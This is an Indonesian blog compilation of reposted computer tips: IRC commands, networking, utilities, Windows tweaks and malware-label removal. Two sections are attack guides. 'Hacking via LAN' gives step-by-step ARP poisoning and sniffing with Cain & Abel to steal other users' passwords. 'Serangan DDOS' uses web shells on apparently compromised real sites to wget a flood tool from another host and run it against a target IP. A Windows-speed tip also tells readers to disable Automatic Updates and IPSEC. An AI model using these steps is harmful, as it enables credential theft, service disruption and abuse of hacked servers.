6. Ganti Server = /server (nama server)

7. Private = /query (nick)

8. Invite = /invite (nick) (#channel)

9. Mode I = /mode (nick) +I

10. Ignore = /ignore (nick)

11. Action = /me (pesan)

12. Whois = /whois (nick)

13. Away = /away (pesan)

14. Balik Away = /away

15. Ping = /ping (nick)

16. Bersihkan layar = /clear

Perintah Standar Untuk OP Channel :

/kick (#channel) (nick) = kick user

/topik (#channel) (topiknya) = mengganti topik channel

/kick (#channel) (nick) (alasan) = kick user dengan alasan

/mode (#channel) +b *!*@IPnya = Band IP user, missal /mode #channel +b *!*@125.123.19.*

/mode (#channel) +b nick!*@* = Ban nick user, missal /mode #channel +b nick!*@*

/mode (#channel) +o (nick) = memberikan Op pada user

/mode (#channel) +v (nick) = memberikan voice pada user

/mode (#channel) -o (nick) = menurunkan user agar tidak Op lagi

/mode (#channel) -v (nick) = mengambil voice user

/mode (#channel) +/- ntispklRrmc = set mode channel

/channel = melihat mode dan ban list channel

Sumber :http://cyberdos.org

status YM di Facebook

1. login ke facebook kamu.
2. buka halaman ini http://apps.facebook.com/profile_html/
3. klik gabung, atau bisa langsung klik di kanan atas tulisan "ke aplikasi ini"
4. copy paste code berikut.

<div align="center"><a href="ymsgr:sendIM?ID_YM_KAMU"><font size="2"><img border="0" src="http://opi.yahoo.com/online?u=ID_YM_KAMU&m=g&t=2"/></a></div></div><br><div align="center">
ganti tulisan yang bercetak tebal dengan id YM kamu.

5. lalu klik submit
jadi deh:)

untuk mengubah gambar status ym tinggal kamu ubah aja angka yang berwarna merah di bawah ini:
<a href="ymsgr:sendIM?ID_YM_KAMU"><font size="2"><img border="0" src="http://opi.yahoo.com/online?u=ID_YM_KAMU&m=g&t=2"/></a></div></div><br><div align="center">

ubah dengan angka 1 samapai 14
dan lihat hasilnya..

Sumber : http://cyberdos.org/

Koneksi_2_PC_menggunakan_kabel_Cross

Seorang gila jaringan mungkin ada yang sampai hati untuk membawa-bawa kabel utp jenis crossing lengkap dengan laptop dalam tas gendongnya setiap saat. Penulis pun pernah dalam kondisi seperti itu. Biasanya hal ini terjadi karena orang gila jaringan tersebut selalu ingin melakukan pekerjaan di berbagai tempat dengan 2 PC sekaligus. :). Walaupun pada saat sekarang ada sebuah alat yang tidak repot dan tidak dapat digunakan untuk membelitkan leher. :D. Yakni USB Wlan. Namun ada kondisi yang tidak memungkinkan untuk dapat menggunakan usb wlan, seperti kondisi ekonomi kantong tipis orang gila jaringan tersebut, walaupun hanya mengeluarkan beberapa lembar uang kertas untuk membelinya, tapi tetap saja ini adalah inti permasalahannya, dan berbagai kendala lainnya. :D

Dari situlah tutorial ini berawal, sebelum dapat mengkoneksikan 2 PC menggunakan kabel crossing ada beberapa hal yang dibutuhkan diantaranya :
- Tang kerimping
- 2 buah RJ 45
- Kabel UTP 5e dengan panjang secukupnya, sesuai dengan selera anda
- 2 buah PC yang akan dikoneksikan.

Pertama lepaskan shield kabel ( pelindung kabel biasanya bewarna abu -abu ) beberapa centimeter ( 2 cm), dengan memotong shield tersebut menggunakan tang kerimping, kemudian lurus-luruskan kabel-kabel yang berwarna-warni tersebut, kemudian urutkan kabel berdasarkan pewarnaannya di salah satu ujung kabel UTP tersebut. Urutannya adalah sebagai berikut :


Ini adalah urutan kabel straight, sehingga untuk ujung kabel yang lain urutan pewarnaan kabel tersebut harus berbeda dengan urutan ujung kabel straight ini, inilah yang dinamakan dengan kabel cross, urutan ujung kabel cross adalah seperti ini :



Sehingga di kedua ujung kabel tersebut memiliki urutan warna yang berbeda satu sama lainnya.


urutan lengkapnya seperti ini …


Nah dari sini anda siap mengkoneksikan 2 PC tersebut.
Di windows untuk melakukan koneksi 2 PC sama halnya dengan mengkoneksikan PC dengan topologi jaringan yang sering ditemui, biasanya topologi jaringan itu adalah star di mana di pertengahannya biasa ditemui menggunakan hub ataupun switch. Hal yang harus dilakukan untuk mengkoneksikan kedua PC di windows adalah sebagai berikut :

PC Pertama
Masukkan ke network connection di control panel  :
Start menu | run | control panel

Setelah itu masuk ke bagian Network Connections
Kemudian pilih Local Area Network Connection


Klik kanan Local Area Network Connection, pilih properties


Di kotak dialog Local Area Network Connection Properties, di bagian tab General pilih Internet Protocol ( TCP/IP ) Kemudian Klik Properties


Setelah itu masukkan IP Addressnya 192.168.1.2, kemudian Netmasknya 255.255.255.0


Setelah itu klik button OK, kemudian Close

Nah untuk PC yang kedua tahapnya sama saja dengan yang diatas namun Alamat IP Addressnya berbeda dengan PC yang sebelumnya, anda dapat mengisinya dengan 192.168.1.1 atau dengan IP 192.168.1.x yang lain, terserah anda. Dengan catatan netmasknya harus sama dengan pc yang sebelumnya yakni 255.255.255.0

Kemudian langkah selanjutnya adalah melakukan konfigurasi network setup wizard untuk kedua PC tersebut, agar keduanya dapat saling terhubung sebagai satu workgroup.

Setelah selesai, lakukan ping dari salah satu PC tersebut ke PC lainnya... Jika tampilannya seperti ini maka PC anda telah terhubung satu sama lainnya.

C:\Documents and Settings\Al-k>ping 192.168.1.1

Pinging 192.168.1.1 with 32 bytes of data:

Reply from 192.168.1.1: bytes=32 time<1ms TTL=128
Reply from 192.168.1.1: bytes=32 time<1ms TTL=128
Reply from 192.168.1.1: bytes=32 time<1ms TTL=128
Reply from 192.168.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.1.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms


Selamat ... :D


Sumber dari situs Ilmu Website dalam kategori jaringan dengan judul Koneksi 2 PC menggunakan kabel Cross

Menghilangkan Label Google Malware Badware

Pernahkah anda menemukan hasil search google seperti di atas? Nah pada artikel kali ini Team Ilmuwebsite akan membahas bagaimana hal itu bisa terjadi dan bagaimana cara memberikan pertolongan pertama pada website yang terkena label tersebut.


Ada beberapa hal yang perlu di ketahui:

Malware (singkatan dari istilah Bahasa Inggris: malicious software, yang berarti perangkat lunak yang mencurigakan) adalah program komputer yang diciptakan dengan maksud dan tujuan tertentu dari penciptanya dan merupakan program yang mencari kelemahan dari software. Umumnya malware diciptakan untuk membobol atau merusak suatu software atau sistem operasi.(Wiki).

Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)



Stopbadware.org adalah suatu organisasi yang melawan badware, mereka akan mencoba membantu konsumer untuk mendapatkan hasil download yang bersih. StopBadware.org juga akan membantu anda jika website anda terkena Label Badware/Malware dari google, seperti yang dikatakan dalam website mereka "kami memiliki orang di google, sehingga akan mempermudah proses pembersihan Label Badware/Malware yang di berikan Google ke pada website anda".

Google sebagai search engine terbesar di dunia ingin memberikan hasil search yang bersih dan aman kepada para searcher baik itu dari sisi website maupun seo, nah khusus untuk yang dari sisi website, google selain melakukan crawl   dia juga melakukan scaning terhadap suatu website apakah website tersebut mengandung script yang termasuk kedalam kategory malware/badware atau tidak.

Dalam kegiatan tersebut google bekerjasama dengan stopbadware.org untuk memberikan informasi  kepada:
Administrator(suspect website) biasanya google akan mengirimkan email ke:
abuse@website-anda.com
admin@website-anda.com
administrator@website-anda.com
contact@website-anda.com
info@website-anda.com
*sehingga anda perlu membuat salah satu email di atas untuk jaga-jaga menangkap informasi yang di kirimkan oleh google, jika website anda terkena Label Malware.

Mereka juga menginformasikan kepada masyarakat umum (pengguna Google Search), bahwa website tersebut mengandung Malware, dengan cara menampilkan seperti ini:


dan jika di klik maka anda akan di bawa ke halaman ini:




 Penyebab:
Salah satu proses masuknya malware/badware ke dalam website anda bisa di sebabkan oleh adanya virus di komputer anda, disaat melakukan update  website (upload file php atau html) baik itu melalui FTP atau Browser maka virus akan meng-injeksikan beberapa script malware/badware ke dalam halaman website tanpa anda sadari sebelumnya, sehingga ketika google melakukan scaning dan menemukan script malware/badware ada di website anda maka google akan langsung memberikan Label Badware/Malware dalam SERP mereka.

Cara mengatasi:
Untuk mengatasi / menghilangkan Label Badware/Malware dalam SERP Google, maka anda perlu melakukan beberapa hal, diantaranya:

1. Melakukan pembersihan script malware/badware pada script website anda
2. Meminta review pada pihak stopbadware.org
3. Meminta review pihak Google

Khusus untuk poin yang ke 3. yaitu Meminta review pihak Google, caranya adalah

1. Anda harus memiliki account di google, bisa berupa email di google.
2. Masuk ke http://google.com/accounts pilih Perkakas Webmaster / Webmaster Tools jika menu tersebut melum ada maka anda harus mendaftar di google webmaster tools dulu.
3. Daftarkan website anda di google webmaster tools lalu lakukan verifikasi / verify
4. Setelah ter verify silahkan masuk menu Overview dan klik link Review site

Tunggu 2 x 24 Jam, pihak stopbadware.org akan mereview website anda dan jika website anda memang sudah bersih dari malware/badware maka mereka akan menghubungi  google, setelah itu Google akan melakukan review  secara langsung. Setelah mereka menyatakan website anda benar-benar bersih maka  Label Badware/Malware dalam SERP Google akan segera di hilangkan, biasanya proses penghapusan Label ini memakan waktu 1x24 jam... jadi sabar ya.... :)

Thanks semoga artikel ini berguna untuk anda para webmaster.

B_scorpio - Team Ilmuwebsite
Salam untuk: Semua para pembaca setia ilmuwebsite.com dan Team Ilmuwebsite.
Sumber dari situs Ilmu Website dalam kategori search engine tutorial dengan judul Menghilangkan Label Google Malware Badware

TrueTransparency

Saat ini ada banyak sekali software yang dapat digunakan untuk mengganti tampilan Windows, misalnya dengan transformation pack yang pernah di tulis di sini, WindowBlinds, Talisman, dan sebagainya. Salah satu “kelemahan” dari transformation pack adalah seringkali membuat Windows kurang stabil alias sering hang.

Sekarang ada lagi software yang bisa Anda gunakan untuk membuat “beda” Windows Anda, yaitu dengan menggunakan TrueTransparency. Software ini cukup kecil, tidak makan resource yang besar dan yang tidak kalah penting adalah gratis

Kalau Anda pengen mencoba TrueTransparency, Anda bisa download di http://www.crystalxp.net. Untuk tambahan skin baru Anda bisa download di http://browse.deviantart.com.

TrueTransparency tidak dilengkapi dengan installer, jadi untuk menjalankan software ini Anda tinggal mengekstrak file yang sudah Anda download dan klik 2x pada file TrueTransparency.exe.

sumber : http://www.klik-kanan.com

Task Manager Darurat Mengatasi Komputer Hang

Pernahkah mengalami kejadian tiba-tiba komputer hang, tidak ada respond dan kita hanya bisa menggerakkan mouse tanpa bisa menjalankan aplikasi lain ? Bahkan kadang jurus pamungkas “Task Manager” ( Ctrl+Alt+Del ) pun tidak berdaya menghadapi kondisi semacam ini. Sehingga mungkin ujung-ujungnya kita hanya menekan tombol Reset.

Meskipun tombol reset bisa mengatasi, tetapi kadang bisa beresiko kehilangan data, ada fie yang rusak dan sebagainya. Alternatifnya, kita bisa mencoba menggunakan software gratis AntiFreeze.

AntiFreeze mungkin memberikan alternatif terakhir untuk mengatasi kejadian seperti diatas. Kejadian seperti itu bisa disebabkan oleh penggunaan CPU yang berlebihan (hampir 100%) atau penggunaan Memory yang terlalu besar, sehingga kita sama sekali tidak bisa membuka, berpindah atau menutup aplikasi apapun.

Setelah software ini di install, maka untuk mengaktifkan, kita tinggal menggunakan kombinasi tombol keyboard Ctrl+Alt+Win+Home ( Memang kombinasi yang cukup banyak, sampai 4 tombol :) ). Setelah itu AntiFreeze akan tampil fullscreen (satu layar penuh) dan hampir semua aplikasi lainnya akan di hentikan sementara (sleep) untuk menurunkan penggunaan CPU/Memory.

Ketika AntiFreeze tampil, kita tinggal mematikan process (End Process) aplikasi yang menggunakan CPU sangat besar ( indikasinya terlihat di kolom CPU Time) atau bisa juga penggunaan memory yang berlebihan (Mem Usage). Karena tampilannya menunya mirip Task Manager, seharusnya kita tidak akan kesulitan menggunakan software ini.

Keadaan-keadaan dimana AntiFreeze bisa digunakan, yaitu :

* Ada satu atau lebih aplikasi yang berjalan sangat intensif, menggunakan hampir seluruh proses CPU, sehingga sistem tidak responsif.
* ADa satu atau lebih aplikasi yang menggunakan Memory sangat besar (berlebihan) termasuk swaping file, sehingga membebani sistem.
* Ada Aplikasi yang dijalankan dengan prioritas sangat tinggi, sehingga menggunakan semua proses CPU (processor)
* Banyak program yang berjalan bersama-sama dan masing-masing ingin mendapatkan “perhatian/jatah” dari Processor.

Meskipun Demikian, terkadang AntiFreeze tidak berhasil atau tidak berjalan untuk kondisi-kondisi tertentu. Misalnya Komputer hang karena masalah hardware, seperti Memory(RAM) yang rusak, bad sector pada Hardisk dan sejenisnya (dan biasanya ditandai dengan Mouse Cursor yang tidak aktif /tidak bisa digerakkann ). Selain itu AntiFreeze juga mungkin tidak akan berhasil jika Aplikasi mempunyai prioritas yang lebih tinggi dari AntiFreeze.

Download AntiFreeze (814 KB), Informasi selengkapnya tentang AntiFReeze disini

http://www.resplendence.com/antifreeze (ebsoft.web.id)

sumber : http://ebsoft.web.id

Tips Format Flashdisk dengan File system NTFS

Sebagian kita mungkin jarang memperhatikan tipe file sistem yang digunakan Flashdisk kita, apakah itu NTFS, FAT32 atau FAT. Untuk mengetahui file sistem yang digunakan, klik kanan Flashdisk di Windows Explorer dan pilih Properties. Di sana terlihat tipe File System yang digunakan.

Tetapi ketika kita akan mencoba mem-format melalui windows Explorer, mungkin disana tidak ada menu NTFS, adanya hanya FAT32 dan FAT. Bagaimana cara mem-format NTFS dan apa bedanya dengan FAT32 dan juga FAT ?

NTFSmerupakan format file system Windows terbaru setelah FAT32, dan mempunyai beberapa kelebihan seperti kemampuan menyimpan tambahan informasi mengenai file/folder (metadata), fitur keamanan, kompresi data, struktur yang lebih baik dan lainnya.

Selain itu, tipe NTFS bisa digunakan untuk mem-format ukuran yang lebih besar, Untuk FAT hanya 2 GB, FAT32 8 TB ( 8.000 GB), sedangkan NTFS bisa sampai 16 EB ( 16 juta TB ). Meskipun demikian, tetap saja NTFS ada kekurangannya, seperti tidak terbaca di Win9x dan proses baca tulis ke disk yang lebih sering.

Karena tiap file/folder menyimpan informasi yang lebih banyak (metadata), maka proses baca tulis tiap file/folder akan lebih sering daripada tipe FAT32 atau FAT, sehingga untuk flashdisk, mempengaruhi umur (daya tahan). Mengingat Memory Flashdisk mempunyai batasan baca tulis. ( artikel tentang menjaga flashdisk agar lebih awet bisa dibaca disini : Karakteristik dan Tips menjaga Flashdisk lebih awet )

Mengaktifkan format NTFS di Windows Explorer

Bisa saja kita mem-format USB Flashdisk dengan tipe NTFS dengan bantuan HP USB Format ToolsHP USB Format Tools. Tetapi sebenarnya Windows Explorer bisa melakukannya. Untuk mengaktifkannya bisa diikuti langkah berikut

1. Buka System Properties dengan cara Klik kanan My Computer > Properties (atau dengan tombol Keyboard Win + Break )
2. Buka tab Hardware kemudian klik tombol Device Manager
3. Pilih Disk Drive dan pilih Flashdisk yang ingin di format dengan NTFS, klik kanan, pilih Properties.
4. Setelah terbuka pilih Tab Policies
5. Pilih Optimize for performance dan klik OK


6. Setelah itu coba klik kanan Drive flashdisk di windows Explorer dan pilih menu Format, maka disana seharusnya sudah muncul File System NTFS.

Yang perlu diperhatikan adalah ketika opsi ini diaktifkan, setiap mencabut flashdisk harus selalu melalui Safety Remove Hardware. Jika pilihan adalah “Optimize for quick removal” maka sebenarnya flashdisk bisa langsung dilepas, tanpa Safety Remove hardware

Test antara NTFS, FAT32 dan FAT

Saya telah mencoba beberapa perbandingan (terutama proses meng-copy data) dengan tipe yang berbeda-beda, dan hasilnya sebagai berikut :

* Copy 11 file (ukuran masing-masing sekitar 170 MB) total sekitar 1.8 GB
NTFS 04:44 ( 4 menit 46 detik )
FAT32 05:09 ( 5 menit 9 detik)
FAT 04:46 ( 4 menit 46 detik)
* Copy 1.297 files (ukuran antara 1 KB sampai 23 KB) dengan total 8,23 MB
NTFS 29 detik
FAT32 56 detik
FAT 58 detik
* Kapasitas setelah di Format
NTFS 2.038.044.672 bytes Used space 12.937.216 bytes (12.3 MB)
FAT32 2.046.959.616 bytes Used space 4.096 bytes (4.00 KB)
FAT 2.050.686.976 bytes Used Space 0 bytes

Terlihat proses copy data dengan NTFS, relatif lebih cepat, tetapi ukuran setelah di format sedikit lebih kecil karena memang diperlukan space tambahan yang lebih besar untuk informasi file/folder (metadata). Jika flashdisk sering digunakan untuk proses baca tulis dan tidak begitu memerlukan fitur-fitur NTFS, seperti keamanan data, maka memilih tipe FAT32 mungkin akan lebih baik.

Artikel berikutnya insyaAllah akan membahas tentang memanfaatkan tipe NTFS untuk melindungi Flahsdisk dari Virus yang akan membuat, menghapus atau memodifikasi Autorun.inf dengan program sederhana yang saya buat “Super Autorun”.

sumber : http://ebsoft.web.id

Tips Remove AVG untuk Install Kaspersky

Untuk para pengguna Anti Virus yang ingin menggantinya dengan Kaspersky Anti Virus, biasanya akan mendapatkan sedikit masalah pada proses installisasi Kaspersky. Proses instal tidak dapat berjalan karena akan muncul pesan “incompatible software - installed error” .

Hal ini terjadi karena Anti Virus AVG yang sebelumnya anda gunakan telah mempunyai dan membuat data Registry. Dan ketika anda meremove/uninstall melalui Control Panel maka Data Registry ini belum terhapus.

Untuk mengatasi masalah ini anda dapat melakukannya dengan menggunakan software seperti CCleaner ataupun TuneUp Utilities 2009. Atau juga dapat melakukannya melalui cara manual melalui Registry Editor.

Dengan cara manual dibawah ini kita bisa menghapus entry registry AVG sebelumnya, sehingga nantinya kita bisa menginstall Kaspersky Anti Virus 2009.

Pertama anda buka start menu -> run lalu ketikkan -> regedit -> enter . Pada halaman Registry Editor, arahkan pada entri yang saya sebutkan dibawah ini ;

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG7Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG6INSTALL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG8Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\AVG\Avg8

Klik kanan pada entri tersebut lalu hapus / delete. Jika anda menggunakan 64 bit maka entri yang harus dihapus seperti dibawah ini ;

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AVG7Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AVG6INSTALL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AVG8Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\AVG\Avg8

Setelah anda melakukan seperti petunjuk yang diatas, baru bisa berikutnya anda install Kaspersky Anti Virus 2009. Sebelumnya permasalahan seperti ini sudah pernah ada yang menanyakan melalui pesan komentar dan juga ada beberapa teman yang menjawabnya (avicenna). Jadi dengan tips pada postingan ini akan lebih mudah untuk anda yang mengalami permasalahan seperti ini.

sumber : www.d60pc.com

Backtack 4

untuk backtrack 4 beta bisa di download disini

Backtrack 4 beta

md5 checksum : 7d1eb7f4748759e9735fee1b8a17c1d8

Backtrack 4 beta

md5 checksum : 38acdcbaf6c73d7c55180dfea8641e5d

Seminar Securty System dan Live Demo Hacking 2009

Seminar Securty System dan Live Demo Hacking 2009

sabtu & maret pukul 09.00 s.d 16.00 WIB
tempat aula kampus STMIK"AMIKBANDUNG"

seminar :
\ Wireless Hacking
\ Local Hacking dan cara pengamanannya

Tiket Box :
* pelajar, Mahasiswa : Rp. 30.000,00
* Umum : Rp. 50.000,00

Fasilitas :
+ CD Hacking
+ Coffebreak
+ Sertifikat
+ Doorprize

Registrasi :
Sekertariat SEMA
Senat Mahasiswa STMIK"AMIKBANDUNG"
jln. Jkarta no.28 Bandung Jawa barat

Contact :
# YAnti (08565991432)
# Rosid (02276153456)

Suported By :
+secerehacklink
+yogyafree
+APTIKOM

Hacking via LAN

Cara hacking via LAN

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
Download wireshark
Download Cain & Abel

Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)


sumber: http://kwoksundip.wordpress.com/

Percepat Windows

biar windows kenceng larinya dan tidak boros memory

Sebenarnya banyak aplikasi buat tweak XP, baik secara manual maupun meggunakan software. Namun kali ini gw bakal kasih tips buat lo2 pade terutama matiin aplikasi pada service.

Jalankan services.msc (start,run,services.msc)

matikan/disablekan service-2 berikut ini yang tidak berguna
Alerter
Application Layer Gateway Service,
Application Management
Automatic Updates
Background Intelligent Transfer
Clipbook
Distributed Link Tracking Client
Distributed Transaction Coordinater
Error Reporting Service
Fast User Switching Compatibility
IMAPI CD-Burning
Indexing Service
IPSEC Services
Messenger
Net Logon
Net Meeting
Remote Desktop Sharing
Network DDE
Network DDE DSDM
Portable Media Serial Number
Remote Desktop Help Session Manager
Remote Registry
Secondary Logon
Smartcard
SSDP Discovery Service
Telnet Themes
Uninterruptible Power Supply
Universal Plug and Play Device Host
Upload Manager
Webclient
Wireless Zero Configuration
WMI Performance Adapto


sumber: http://kwoksundip.wordpress.com

Serangan DDOS

DDOS LEWAT PHPSHELL

Layanan IP dan TCP yang bekerja di mesin anda adalah termasuk salah satu
celah yang memikat untuk melancarkan serangan DDOS.
Disini papi mau menulis bagaimana memasang senjata buat DDOS.
Tapi ingat jangan sampai disalah gunakan,karena sangat berbahaya.
Terutama jangan buat DDOS warnet karena papi sendiri kerja diwarnet,
Benar-benar nggak enak kalau lagi user ramai eh tau-tau putus karena kena DDOS.

Langsung saja pada pembahasan kali ini papi asumsikan anda semua sudah tahu,
Bagaimana mencari target yang bisa dipasangi PHPSHELL.
Bagi yang belum mengerti silahkan anda baca pada “OLDDATABASE”
Disana sudah banyak tulisan/tutorial yang membahasnya.

Papi ambil contoh dari salah satu target yang telah papi siapkan

http://www.gotvape.com/test/.pomponk/phphsell.php
(Contoh web yang sudah terpasang phpshellnya)

Langkah selanjutnya kita upload senjatanya.

http://www.chrisandkristy.com/galbum/.gallery/vadim

Sekarang kita upload dengan menggunakan command wget.


Gambar PHPSHELL yang akan ditanami senjata(vadim)

Selanjutnya kita lihat apakah senjata/Vadim yang kita upload sudah masuk!!!
Ketikkan command ls –a

total 92
drwxrwxrwx 2 wwwuser www 4096 Apr 30 11:25 .
drwxr-x--x 67 wwwuser www 8192 Apr 30 11:23 ..
-rwxrwxrwx 1 wwwuser www 64973 Dec 4 23:43 index.html
-rw-r--r-- 1 wwwuser www 5686 Aug 24 2005 phpshell.php
-rw-r--r-- 1 wwwuser www 6114 Jul 28 2005 vadim

Nah… ternyata kita berhasil memasukkan senjata/vadim
Kemudian kita kasih command CHMOD

Ketik begini chmod 755 Vadim

Setelah itu anda bisa menggunakannya dengan perintah begini:

./vadim ip port (./vadim 206.xxx.xxx.xxx 53)

Sumber : http://www.acehforum.or.id

Serangan DoS

Serangan DoS (Inggris: denial-of-service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

• Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.


• Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.


• Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

